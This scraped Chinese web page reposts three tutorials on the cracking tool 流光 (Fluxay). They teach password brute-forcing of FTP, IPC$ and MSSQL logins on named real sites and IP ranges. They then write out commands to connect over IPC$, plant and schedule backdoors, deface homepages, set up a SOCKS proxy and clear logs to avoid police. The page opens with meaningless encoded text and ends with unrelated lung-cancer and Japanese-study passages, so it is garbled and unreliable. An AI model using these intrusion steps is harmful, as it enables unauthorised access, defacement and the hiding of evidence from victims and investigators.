enrtmu1v00yywl ta39flo8qn99iaxbpaencqmbs9 ojobhz4tpjif1sr9eq5wuurgmh怎么用

enrtmu1v00yywl ta39flo8qn99iaxbpaencqmbs9 ojobhz4tpjif1sr9eq5wuurgmh怎么用,第1张

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

流光教程

流光教程一 ON,Z$G^ mU

许多新人在用流光的时候不知道如何下手,小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 :),就抽了点时间写这个简单的教程,希望让新手快速入门。 $Xn3l E&e M'fl7I

h4r3|)V"S&y

我个人认为流光的破解可分为5大部分: #c"J4l'uL;Mum

nZX'vd;E3D4{+A6g 一、POP3/FTP/…探测

Y D Z"Aw9e

N zl6A8nuxjAZ 二、IPC探测

+v8} ]2i X r3{V ~7cNNZi:W2u

三、SQL探测

0b[1x8g'U #}}8Hx8O

四、高级扫描 4v`I'\ D\Z

\)r+x!e-q)j bf

五、其它 … 9FZ%J-tE6c(}+N8v

Q H^@4VX'p 因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:) Z:X%#a+y A&V

6JO v+] f9jS,m x 下面我就简单说一下基本的破解流程: $~S @O%r2D

z|+|)qsq BC 1、你得有流光,我这里试验用的是流光2001FOR Win98 中文版FOR Win2000的也可以。 nQ4]v-Az9NCD_7G

Q a:x7cKf4u 首次启动流光,看到如下图的界面: :x2jWr0nJ+x

"d)zkP!\ h$a ]|&Q0uro

X-U9[zO"k;M

首次使用是要注册的,不过不要想到花钱:),小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项,然后点发送即可,如果发送失败,你把发送服务器换个就好了。

1Dy^7CM4y4jj7BA )[sRpa7_/w

S;X j@_H

E+U4xtR:@5EYt/CJ)}

因为重装系统,我也不知道我发了多少次了 :( 。如果不想注册,就稍等下面的进度条走完,点稍后即可。如上图:

y\Bs9Np9~9f%Ol`9F F5OGX-X3c@U9L

tN;FQDgH-x -s(Z5w5FEr@p[

H9ed$^"N[P"X A$}Vtx6q2sJ

2、找个站点,我选的是中华网[url]wwwchinacom[/url]的主页空间(home4uchinacom),探测方式:FTP。

N |B^Fk4Y +I V+X lf

有人常问扫描端口有什么用,其实作用就是你知道他提供了什么服务,然后可以采取相应的探测方式来获得PASS了:)我们知道主页几乎都用的FTP上传,我们这次就用来测试一堆用户名,看看有没有弱智的密码,呵呵,如果有 hackeratchinacom 这样的,也不妨霸占为己有:)

4n9N OnqZkd

7W NmEQ5ZHw 3、加入要破解的站点名称:右键单击FTP主机→编辑→添加→输入 home4uchinacom →确定! \:] B E'MGw

mZy9yF:qpE8K eJ5L!I a#C4I1Ow

yU&CX#X$x,r

CrN Ap

!zS,@}0m/P,V7} 4、加入用户名:我们要破解的是一堆用户名,所以要加入用户名的列表文件!我们就加入流光目录下的 Namedic :)右键单击刚才添加的主机:home4uchinacom → 编辑 → 从列表中添加 → Namedic → 打开

;g$dk H-W 5itXRHu%8G

7_bvg'fU

C&@2H W,]S NO%yOw-Y\E x hJkB6l

1l;v0{`!~d+e%hU u

然后会有“用户已存在列表中”的提示,我们选中“不再提示” → 确定 。如下图: 6A ~:uu X3eh

$G7Z%~ nw

wVF5^tB#yT#k%Nf7c

CkjR-X[_@-b 用户名太多,我们可以用点主机前面的“—”号把用户列表缩起来,如下图:

+l3^8TC0R3Ml

7Q,FP oe`"[mk Z-m1x^kB8j$Ej]

!V8WoCEr

大家注意名字前面的小框中必须有√要是没有就无法探测了。 Xcj)[ PR

\JL,X5W Cv Lv o3G

5、有了用户名,我们就可以进行探测了,大家会想到怎么不用密码?其实流光有个简单模式的探测,也就是用内置的密码”:“123456”和“用户名”来进行探测,因为这样的密码是使用频率最高的:) 9r)e b;M4Y5y#pixy

{M JrO#j@Hmg_ 当然你可以修改这个简单模式的文件,加入你认为弱智的密码。方法是:单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘! OQhI^,O

F Q_~k ODI 下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。

}S~5M{)E

EbUz RqHZ 探测 → 简单模式探测!

u$b'n(jR,Ik0h@

b(P|@-s,U!P;uO{ hmT2lt},|

T ]q&I2q~

3F_(W(C j\

M s+q O3L$s 探测中…

:fJ+A;T@S}&u

y+gBl C-_6x"U@X+M1]B

$kSq!g] X

K]e/y^Ii

:]^YE/A$fB#W

1M+]t+eW QAM 6、探测完毕,也看到结果了,流光会问我们是否查看入侵检测报告,不想看可以选否。

sQ!cR:C'oms

;w I`&x+y

|I)vh7xc|

;Hga+B5r:vt#Je 报告的画面

2z)S"nS @l4~#VM

ydx!wO b| {Cb1ZDZ

\i c`h xc 7、如果要探测的是一个用户名,就需要添加字典、或者密码方案。方法是:右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。 ]}E5 J l/@

J$``IO#R3i 以上就是流光的一次简单的探测了,事实上这些功能只能算是流光的25版的功能,流光2001增加的IPC/SQL/高级扫描等功能,使流光更加强大。如果你对这个已经很熟悉了,相信你看流光的HELP就会很快的学会其它的使用方法的。

9\W i R-JUV j {L k/X |

关于用户名的问题:有人觉得自己加入的用户名不一定存在,如果不存在岂不是白费了力气?这点你大可以放心,流光会进行验证的。而且现在注册的用户入数之多,想个没有的名字都难,不信你随便敲个试试。

Vi~PLWdY UYk5@Ou

关于字典的问题:流光可以使用字典方案来探测,当然你也可以生成字典,有的新手在作练习的时候不知道怎么做,你也可以用记事本生成,每行输入一个密码,存盘后将扩展名改称DIC,流光就认出来了:)如果你连扩展名都不会改 :( 那……

wp-w7J"Ga)\af+p

L/\Di/`@y X#c

2a2H~/f9W[,L o r @m F ~

只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)

]J+|3{,mJ-k#j!M

0W H%X$sp/@ a

u3I4L%S9n btd

P#m)Zqs

`1_s"W)BD :c"{n_&r]

待续……

香烟 2007-5-28 11:07

流光教程二

很长时间也没有写什么东西了,这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 :(

l P8M"F5M:b2|0k !J:Ix~R h

你既然看到这儿了,就在听我牢骚几句吧:)搞安全应该有正确的心态,别以为你会了个工具使用就可以一步登天。

{B \[y0x\/u 'a+g a S)tUc

交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。

R p4O)Z'qT#L nWxu3Zk0x

5F i GX!xJL+Z#`dN

今天要写的是流光的IPC探测: \,`;P_`

Ev b n+jq 一、目的和任务: +@&g2Bs/dp+i

M UA0P@ O;t pu!DP

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。

V |nnP;_gTX] 2、学习IPC探测的相关知识。

!gnaW4v,Ft9~ 4X-R0J'U:\ |td

二、探测流程:

E],@9y/b Bm#a~ S8HD#%X

1、你得有流光,我这里试验用的是流光2001FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/

XQ#mG"Vj^S }+T!J (U:s,o|P1F\I2p

2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

+DfdoX;})J (~\Q` v \&|7\3o

什么是IPC:

l2E6WK0@4b^

d,d-Txkrx!miLM IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。 p gsh Y_E

S#M+Y+c^+\_|

IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。 (nV6s7f4k

RE u@!T 注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 g/"o[;We AvE w

2\"D,R+t6u;z $s e5mP6@^5v7t

:s#n8[q4rA g

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

#p"U`9F9v8lv,P

xK8X$rAm k{8KG7q5R

2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC

sI)[at

M9ly3t p 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得 A:q6EkB5_v

nLa5QpxL

到弱口令)。

"S[;hr4]W)@

9Q$5X4w(a 在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

u ~ ]` W6C 图main1 4H%SmP u3`-g

7\0v7S7S^ue

+kh]7}vr4A| "B^;XKZ0L;R"_-H

图main2 Qmm _ Lh7GV

-XCq2S~ cQ

EG"miTgi+u

6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机 k3PgQ$p

ZA F#w X 4、探测中…… (start1) %_,sn#G;q3Y`

!Gv@G;t0|1t_D

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样) 6rb2ZLn9n'3F

MKoJ2c

!dnP6me;D%C iCBt)hvs!bm)v

6e(JmneR 5、这是扫描到的NT/98主机列表:(jg1) 9yd R9V @c E G

4z zC1Kn9GOP

1sa _W Om9l

'U0xU mk ^2G5j

6、没有扫描到常用密码:(

2\"r'i'kA&n;o 6KgORI"y t}-T$J

HfegS j c,o9vLQ)K:F

7、就不要查看报告了 :… &e2N(Ki,t \&WM@FO

} z'p-S%yYu4W

WU9g_w/S5A

\:kr_8_7gA)A 8、有了不少NT/98的机器了,正式开始IPC$探测:IPC$主机-探测-探测所有IPC$用户列表。 $P8E]3\9B K2pg

AP#[(N W5P4Y

%n)T h9qO&[k"U3y P Xe

)g2tM"l-^)As8N} 9、注意下面两个对话框的设置:全选上,我们只要IPC$管理员的弱口令。然后点选项

Y i:~C{DP Nzy _x3wxL

(C0M4X W@vO

"mx-qz]%n4z 10、点“选项” :为了加快弱口令扫描速度,这里的两个我们可以全部取消,比如下面的那个,如果对方禁止列出用户了,我想对于一个网管来说,弱口令可能性也是微乎其微。 T1@+Z\q _'xbU

3U+n)L11ZHE0E

]\9K5\6{4o2{3a l8_W

-~K+d6^]%w mg x1_fw[

11、探测中……

L|9Wl/`9i!w

iX5~o5y"E C+@ /l8f#OxW:@Q

FLHKg/vQ

12、有密码了:) vh3tv/zll,p

xm;{Z r+L3{~"k

y1pg2x l z:P l(f6y2[2vSY;K,]

13、又出现了查看报告的窗口,看看 :)

#Y0U fH M@,@Tf x

@^%Z0v(t [| 9m-`)X-P(Q#o,I

C8E [,F W

14、有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办法么? :)有的是 !自己看看工具- i:h0{(AGCO5O

Hj+f!X;Fp8o 菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

}6Pb \+u W#C %V%`@$mu"pH&P

15、黑了他 !

w2K#cu"e}

@2]w5dY+V'D8bB 开个dos prompt 执行如下命令,本次用的例子如下图。

1v'kePX4a-r

)z9N,s5hb-AaH_ 1、 net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接

6sBdD1z3l p#T(o_p5ve+PSqC

2、 copy icmdexe file://对方ip/admin$ || admin$是对方的winnt目录 :) 这里文件多。

Q1Tl,e"K%_/E

-Pr:z%mOn/L 3、 net time file://对方IP/ || 看看对方的本地时间

{7J{ H|:f!oy Q\M

R g;Yi}x+tO1j&_ 4、at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

Luw UB @)L2~fy S0@lz

5、 telnet 对方ip 端口 || 1Q&LR1Z3W/h }

{K9x J4s-U(K%C-_c

6、输入pass (如果不是用icmdexe,或者没有设置口令就不用了) ||

8Hv3k)um1o@~`[ QF@G~%gZ8jF

7、在开个窗口,继续copy 我们用的东西。 copy sockexe copy ntlmexe copy clexe clearexe 1p"+X1LN$K~4k

za1\5E[::j5f

图cmd1

-MRgW,~F/cx

q\&Vh |,P #o&n8N/R` l%RB

9O2i,ZZ ~/~,b kA%c4f-h!v Q 图cmd2

Nl#I\s E V

Ui HR"C%X

;L;\#~A-g])_$o

Z(G;iiC 如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s defaulthtm或者dir /s indexhtm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\

%\YUsC5z2th2w j2WwPsC:@

假如首页文件是defaulthtm并且在c:\interpub\wwwroot,这样:copy defaulthtm \\ip\c$\interpub\wwwroot n{{]4W0F4W#M

_s8c8P\B K

下面的图有演示 t2~5l:i'v,j

T'l!h)XGK_-FN^ 7、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:) /SS,_ ^"L-y

F&D(HL ^ 执行我们copy 过去的ntlmexe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

Gk,Q@ X"n\m us E

} ^\W(a G V,S

Y1aU j9t ^/n[7K

6Z`!q!Dx-W\ 8、做个SOCK5代理玩玩,用在QQ上不错喔: cq&Q `k+h8m

1G1}lX'S(F

执行我们copy 过去的sock -install,net start skserver 看看用在QQ上的效果:)

1CP7F6"mY

[7D&n&l|@

b wh }1O/SW

0s(r2G:K9_A\kB/iw 是不是没有看清上面的步骤呢? \$u1Ll]qJ,\Q(e

1QG2S/zq4_0DK wN 下面是我telnet 上去后所有的命令:)

M)M k|Z $mebZRZr

0c0Zw8X7}I

$pF g1^A 9、还能做成其他的么 ? yLP4s#w"\5i4|

/}2}H6h!jc/|o;A

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)

A&b!W2`My^#v

5Lj} O`qG 10、日志清除,断开连接 : dB#Va F~w f

"x)Op(r[`9D

执行我们copy 过去的clexe clearexe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file://ip/ipc$ /delete

FNwL3v

4J$lx'Xztp 这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。 'rKIh8G V(V

$F&tj+\W6f

在网吧写完 :( 错误之处请赐教。 ,f^#B#yg3u J#q

&u;Y/q~3hN A~ 只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)

香烟 2007-5-28 11:08

流光教程三

关于IPC$的终于写完了,那个该死的网吧,闹哄哄的声音声声入耳 :(,你可能想不出,IPC$探测是我在网吧完成的,而且那个网吧还有公安部门的网络监视器,这东西很有意思,好像是VXD调用,和IE运行库集成到一起的。哪天非弄来研究一下,说不定一款别具特色的木马就问世了 :) PY{ S+Fy!Yo

%J@2J!QlVW7u;A

不知道你看完前一个教程有没有要扁我的想法。。。。

zv'y;w,\!msU

R7dr8gLWpd 交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。 jN;d|C c%|]

\#O"o7Nd

+ER[ x`v'r 今天要写的是流光的SQL探测,顺便说说ipc$补遗和其它的探测手段。

sI!\~F3~

hmwN Eer-Ca+t 一、目的和任务: 1Z%CUh!v:@i DZ

/]a E)Z4G#]e

1、用流光的SQL探测获得一台NT主机的管理权限。 dU/[-d9JI'k

2、学习SQL探测的相关知识。

^q$f5F k o;d qJ 3、IPC$补遗和其它…

$n j6n$V yl 二、探测流程: ,y8gzw)l

,F7ajG@:[ 1、你得有流光,这话不用在说了吧:) rcHF&O4w|C

Ny|f\X

什么是SQL:

2Ek\+Z0G"E \;f"n0Y0 x+F^]6~ H9r

SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间

7K$ek Jbp (wi4PW6s9pU8e/CH

去看看SQL的联机手册,说的很明白。

&W8A4of))t)U

'c3QW@k#Dh@Ll SQL服务程序支持的网络协议: Nl`yf

G0y)F,R$`rH Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER截获数据的危险。

YB5I7`ME E9v4D

-If}ru \ IP Sockets :默认状态下开1433端口,可以被扫描器探测,存在被SNIFFER截获数据的危险。

:b3L{~-S Xl6}E!]2c o3C]

Multi-Protocol :客户端需要支持NT RPCs,数据加密。 4T7f3e{1`[a

JJq(S:o9`\,nk

NWLink :存在被SNIFFER截获数据的危险。 5{/AhH3_F jvLM

%^3qxM8h:\qZ `W!y!m

AppleTalk (ADSP):存在被SNIFFER截获数据的危险 v"t3N"e DZx

7y3r KD UkGZW@ Banyan Vines :存在被SNIFFER截获数据的危险 :t k6Z7RZ;W~

Bkh{3_/y9k7D p

在Internet上,95%以上的SQL Server 采用的都是IP Sockets协议,流光探测的就是这个协议默认的1433端口

;MA'vxIjnL"V7E

([Z8u)b[1N)l[xjf

vI'Go'}dF E qj 2、我们要获得SQL 主机的管理权限,那么还用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

Hz W2VB"Pq

~8U6@/\H:{ 对一台固定主机的探测等我下期的教程:) WUTp!~-M:K

s)XZh4Lz

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@

图main g;S:]_4M$^

)[MQp j

V_0@sF~

$yX0tZ;TX'l(u(b

I0i)Q2cu2iv/ul

3、出先了下面的小窗口,输入我们要破解的IP段,我们输入了来看看。(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现“地址保留的信息”)

iO~/qo|p4\ 图inputip

@,l6S/mi6p ,S4^XK-rb

W7i}tF,` H B j1jWF:~|;MV

%{]-Y;`(wR-[cn 4、探测中……

5hB-uaXGA Xb

bm!hl]-Kn|1F5B 5、有密码了:) 图psss 1→3 &IXett-^ wY+d:N(Q

`,Te`#p` yc2EJi7x%|Qu'e

t:` V9^]

Ee+x-va;W ]F

6uR8p)Crk5\7

aH0cgLClEGp9I

{(S&hN:n

2H]6I3xJ4V | ip#^/H] My-I g7Z

6、下面我们进一部获取管理员的权限。 4bRQK4L

用SQL 客户端去连接主机,没有装SQL :( ……………… 没关系,流光自带了连接的工具,以前我一直都是用的天行的工具SQLexec,但现在可以不用它了。 A d-i9MC3O!oZ1g

R`s AB$u@A

打开菜单 工具 → MSSQL工具 → SQL远程命令看看:) f8jZ]/J

图tools

| q^%g{$H|8p6~

D~ fE/Yj'Hyy G4k#X,br(h

+sjL t+N ]j 图SQLcmd 7`;^3d4Kd&Wt\4ir2a

@0|#ZhI`"U

2^MO8rLD

zL$nGl 4nsBl+X

7、获得管理权限、增加后门

s+Ex MD&zjy(N 图cmdline 6R^ {HtkOe g

5x%G7L_ z;LM A

L0Y2b:sy

8HNh#wkf

0f-}8s(Z%Q gO

{9Rhd aD 8、现在我们已经是管理员了:)

3l"eM1G(e(U { yM tn

以前我们是用at命令来远程运行程序,今天顺便说说流光中自带的“种植者”,看看 工具 → nt/iis工具 → 种植者,我们来用它远程启动icmd这个后门。 xW9{5d lp

4o@7FiO5Mt{

图lookcrop 5q lcnM6k

&H V} ge}_O

oS8D'l&L

l e9G1a~(wy

图crop &V8XM;u }\0t%_Sd

{j qEC#Lc/W

)\$_;k,u-K

H(P1e)G;a7E 图cropend d'VHG6@yu

mXX6A$b N fe3A9u%B]Sk

-VLFBbN 一分钟后登陆看看:

2@'zrwIBz b9f]V4V/Ys"q#gr2H

-L-e)L,m yQG1c

@x3A)}U$I%k1mA

Y,EMOF

6QNC4w6rs't

7O2l(X;TT;bQp

9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。

0T:s(_)^CdaQt

3}YUYvi)g8N 图mode U k/d&bcw'e4m

Da \[ j;^2m

8eQI H3er!\$R

H-QJ/njtF#c

#v(HkA%{,I9E

@i/V5V`u&o “工具”中其他的项目和上面说的两个类似,就不多说了。

:AL A"sF)g\ H2K

8{7e(z[(~0j']zF v

#Rn3O${]&K"h9v NR 10、日志清除,断开连接 ,参考IPC探测,记住可以用种植者远程执行命令。

Q]d%H Q Of5b ot-m mFnM8a#Cv3A

!oSOLF|

关于IPC$补遗:上篇对与IPC$探测的文章,写完后觉得还差点什么没有说:) T)Rlzv#@gC

b8n2^,y}"Ui1` 1、我们虽然只探测管理员(admin)的弱口令,实际上在真正攻击中是任何一个用户口令都不会放过尝试的,因为我们获得了

E:mJ O#P0M,^EAJ !aF C5k!qh9CH

普通用户权限后可以提升权限,事实上,一个普通用户的权限在*nix攻击中是非常重要的。 lCkc)W@m

MN0f:GT%x

2、获得口令后,攻击手法多样,不要局限于我的例程。

XJWu+Q |/U5B/Ffco

3、如果对方没有XXX怎么办?,这类的问题去看看我以前整理的流光FAQ。 v!D+RH z K

'K;t{"S(arM

关于其它探测:

O)},m1]u A1J

]6H {0^7C$U 玩玩3389 ? Lxk8[l8F

Dc~'^#mQ/c3L l

首先终端是WIN2K提供的功能,所以我们在扫描的时候就要选择 “NT/98”的主机,在得到主机列表后自定义端

4]vE0~ b/o CY

6J:XH WY{AN"qu 口来扫描这些主机的3389端口,然后……

7EDO4CM/]NZ 8l3m-J9x'B

玩玩cisco路由器? Y'}L4[x-}:qt

&|7l5x\;nm 自己想想怎么作 ?要是想出来了,我的以后的教程就不用看了 :)

4` [wxXB"o/}~ y!GGM X}\(H:|'`

1_h(r5b"V1E3ht]%j

G6RK^XE-u 明白了么?我说的意思是要灵活使用流光:)

ct4n3molllc期野生型是肺癌常用治疗手段主要是放化疗、手术和中药。根据查询相关信息显示,t4表示肿瘤直接侵及周围组织,或致胆囊或脏器穿孔,N0代表无区域量比较转移。M0代表无远处转移。IIIC期是指T4N0M0。生型是肺癌常用治疗手段主要是放化疗、手术和中药。其中中药治疗,带有举足轻重的作用。中医药治疗适应于肺癌各个阶段、各种类型的治疗。能有效地改善患者的痛苦症状(咳嗽、咳血、胸痛、喘气等)控制和消除胸腔积液中医药可单独治疗也可配合手术及放疗、化疗的治疗。

学习日语五十音:

1、联想记忆法:记忆假名来源的汉字。

2、感官记忆法:边读边写调动听觉视觉一同记忆。

3调整顺序法:再次巩固记忆,锻炼快速反应。

4、实践记忆法:偶像、歌词、动画、漫画、说明书去接触你能接触到的所有日语。

当你觉得难熬的时候,就多想下自己当初学日语的理由,想想那个令你振奋的梦想。才刚跨出门槛迈出第一步,这点难题并不算什么,以后的学习也会有更多的难题,你应该做好心理准备,学习日语需要兴趣,但是,更需要的是毅力和恒心。如果放任自己,那就不要抱怨为什么我总是记不住。一站式出国留学攻略 http://wwwoffercomingcom

欢迎分享,转载请注明来源:品搜搜测评网

原文地址:https://pinsoso.cn/meirong/1142353.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-09-01
下一篇2023-09-01

随机推荐

  • 有没有好的平价补水的套盒呀推荐一下呀?

    皮肤补水是每天不可缺少的一步,尤其在换季阶段,皮肤经常会出现脱皮等现象,这种情况就很尴尬。在这方面我也做了很多功课,从以往使用的礼盒中挑选了五款平价补水的套盒,在效果方面真的好用,推荐给大家~1、佰草集御五行抗衰套盒它的功效正如名字一样,从

    2024-04-15
    49500
  • 妮维雅润肤霜能涂脸吗

    通过了解就会发现,妮维雅是可以涂脸的,由于质地比较厚重,为此可以混合精华一起使用,而且能够更好的被面部所吸收,才能够更好的达到美白的效果。妮维雅润肤霜能涂脸吗的问题之所以被人们所重视,主要是更好的让肌肤保持水分,让肌肤的状态变得更加轻盈透亮

    2024-04-15
    33700
  • 精华霜和精华液有什么区别?

    精华霜和精华液的区别:1、精华霜精华霜是这几种精华质地中为数不多固定类的精华,水分和油分都比较充足,但并没有因此显得厚重,相反精华霜的质地是几种精华中最为温和的一种。涂抹在脸上即可化成水,非常温和不会刺激皮肤。挑选建议:精华霜温和无刺激,适

    2024-04-15
    41800
  • 飞机化妆品能单独托运吗 飞机化妆品能单独托运吗吗

    1、飞机化妆品能单独托运;2、托运对于化妆品并没有过于严格的要求,只要将化妆品重量控制在规定的数值内即可放心托运。另外易燃易爆的啫喱或发胶等类型的洗护用品不能托运,所以坐飞机外出不要携带这类化妆品。3

    2024-04-15
    34300
  • 妮维雅防晒隔离润肤露spf30pa++是物理防晒还是化学防晒?防晒时间是多少?

    您好,知我药妆肌肤顾问很高兴帮助您。SPF是防晒指数(SunProtection Factor )的英文缩写,是防晒护肤产品对紫外线防护能力的大小。 SPF指数越高,对皮肤给予的保护能力就越大。SPF值不同,表示有效防晒的时间也不同。具体为

    2024-04-15
    23800
  • 身体乳哪个牌子的补水保湿效果好?身体乳哪个牌子效果好?

    身体乳哪个牌子的补水保湿效果好?身体乳哪个牌子效果好?一款好用的身体乳有着非常好用的补水保湿质感,更好的呵护朋友们的身体,带来舒适的滋润体验,我为大家推荐下几款非常好用的身体乳品牌,一起来看看吧。1丝塔芙身体乳

    2024-04-15
    28100
  • 93年康银阁套盒发行量

    康银阁大四连藏品名称第四套人民币四连体大全套(康银阁)  装帧单位北京康银阁钱币有限公司  发行时间2002年3月  发行数量100000册(约60000册被非法裁切成第四套大全套全同号)  藏品面值12912  藏品内容收录了第四套人民币

    2024-04-15
    26300

发表评论

登录后才能评论
保存